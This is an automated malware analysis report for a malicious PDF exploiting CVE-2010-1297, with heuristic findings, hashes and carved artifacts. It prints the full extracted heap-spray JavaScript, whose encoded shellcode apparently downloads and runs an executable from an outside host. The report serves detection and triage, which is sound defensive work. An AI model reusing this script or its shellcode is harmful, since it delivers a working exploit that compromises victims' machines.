Malicious PDF — malware analysis report

Static analysis result for SHA-256 e0d98da6e4699d7e…

MALICIOUS

PDF

111.3 KB First seen: 2026-05-08
MD5: 7675f5386b725255503acfd29fffdf79 SHA-1: 3ee8d0b50b0ddab587200fe282d5f3378cd01658 SHA-256: e0d98da6e4699d7ebef6d54f9111ccba15a5c1afbb301a1f3cdfa508c7e5cc99
264 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF exploits CVE-2010-1297, a heap-spray vulnerability in Adobe Flash Player, to achieve code execution. The embedded JavaScript uses String.fromCharCode to decode shellcode and constructs a large string that likely serves as a heap spray. The script also references an embedded SWF file and a JavaScript file, indicating a multi-stage attack. The reconstructed URL 'http://www.flashandmath.com/download/pdf.php?file=20102884.swf' suggests the document is designed to lure the user into downloading a malicious Flash file.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • CVE-2010-1297 — Adobe Flash/Reader authplay heap-spray (Flash-in-PDF) critical CVE likely CVE_2010_1297
    PDF embeds a Flash (SWF) object via RichMedia and its JavaScript heap-sprays to groom memory for the embedded Flash exploit. This is the CVE-2010-1297 (authplay.dll) Flash-in-PDF memory-corruption shape; the spray is recovered after de-obfuscating space-padded %u, fromCharCode and \u builders that evade the raw heap-spray rules.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var chars = String.fromCharCode(37008) + String.fromCharCode(37008);var code = chars + '\u42EB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6074\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u5EEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u37E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0A74\uCFC1\u010F\uE9C7\uFFF1\uFFFF\u7C3B\u2824\uDE75\u5A8B\u0124\u66EB\u0C8B\u8B4B\u1C …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • RichMedia (Flash) high PDF_RICHMEDIA
    PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.flashandmath.com In PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In PDF document text
    • http://adobe.com/AS3/2006/builtinIn PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
20102884.swf pdf-embedded-file PDF EmbeddedFile object 16 at offset 0x74D 55839 bytes
SHA-256: ce5f7936cf8e3536a88a804ce2d6902022df1794fa878bdc64a26866e34ba989
Detection
ClamAV: No threats found
Obfuscation or payload: likely
actual_type=SWF; declared_or_context_type=PDF; filename=20102884.swf; kind=pdf-embedded-file
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0xF6 1518 bytes
SHA-256: 117e2a90f605539ae2dee3740724b8b681bcefb139fd412f18b526d2028b8640
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var chars = String.fromCharCode(37008) + String.fromCharCode(37008);var code = chars + '\u42EB\uB95F\uFFFF\uFFFF\uFE89\uFFB0\uAEF2\u47FE\u89FF\uB0FB\uF2FF\uFEAE\uFF47\uFD89\uAEF2\u47FE\uEBFF\u6074\uC931\u8B64\u3071\u768B\u8B0C\u1C76\u5E8B\u8B08\u2056\u368B\u3966\u184A\uF275\u5C89\u1C24\uC361\u5EEB\u8B60\u246C\u8B24\u3C45\u548B\u7805\uEA01\u4A8B\u8B18\u205A\uEB01\u37E3\u8B49\u8B34\uEE01\uFF31\uC031\uACFC\uC084\u0A74\uCFC1\u010F\uE9C7\uFFF1\uFFFF\u7C3B\u2824\uDE75\u5A8B\u0124\u66EB\u0C8B\u8B4B\u1C5A\uEB01\u048B\u018B\u89E8\u2444\u611C\uEBC3\u315A\u52D2\u5352\u5255\uD0FF\u1AEB\u63EB\u78E8\uFFFF\uBAFF\u99F8\u3C3F\u5052\u8FE8\uFFFF\u31FF\u52D2\uD0FF\u33EB\u60E8\uFFFF\uBAFF\u1EE3\u1012\u5052\u77E8\uFFFF\u31FF\u81D2\uFFC2\uFFFF\u81FF\uFAEA\uFFFF\u52FF\uFF53\uEBD0\uBAC3\u9D33\u725E\u5052\u57E8\uFFFF\uEBFF\uEBA8\uE85A\uFF2B\uFFFF\u6CBA\u3C43\u5258\uE850\uFF42\uFFFF\uFF56\uEBD0\uE8DA\uFEF4\uFFFF\u7275\u6D6C\u6E6F\u642E\u6C6C\u75FF\u6470\u7461\u2E65\u7865\uFF65\u7468\u7074\u2F3A\u732F\u6174\u7274\u6361\u6C70\u7461\u6E69\u6D75\u692E\u666E\u2F6F\u6564\u7065\u7274\u6361\u2F6B\u6C42\u6565\u6964\u676E\u694C\u6566\u2F32\u7264\u706F\u702E\u7068\u653F\u413D\u6F64\u6562\u322D\u3130\u2D30\u3832\u3438\uCDFF\u0003';var c = chars;while (c.length + 28 < 65536){	c+=c;}var v = c.substring(0, (0x0c0c-0x24)/2);v += code;v += c;var d = v.substring(0, 65536/2);while(1){	d += d;	if(d.length >= 0x80000) break;}var t = d.substring(0, 0x80000 - (0x1020-0x08) / 2);var f = new Array();for (var i = 0; i < 0x1f0; i++){	f[i]=t+'s';}

Open this report in the interactive analyzer, or submit your own file for analysis.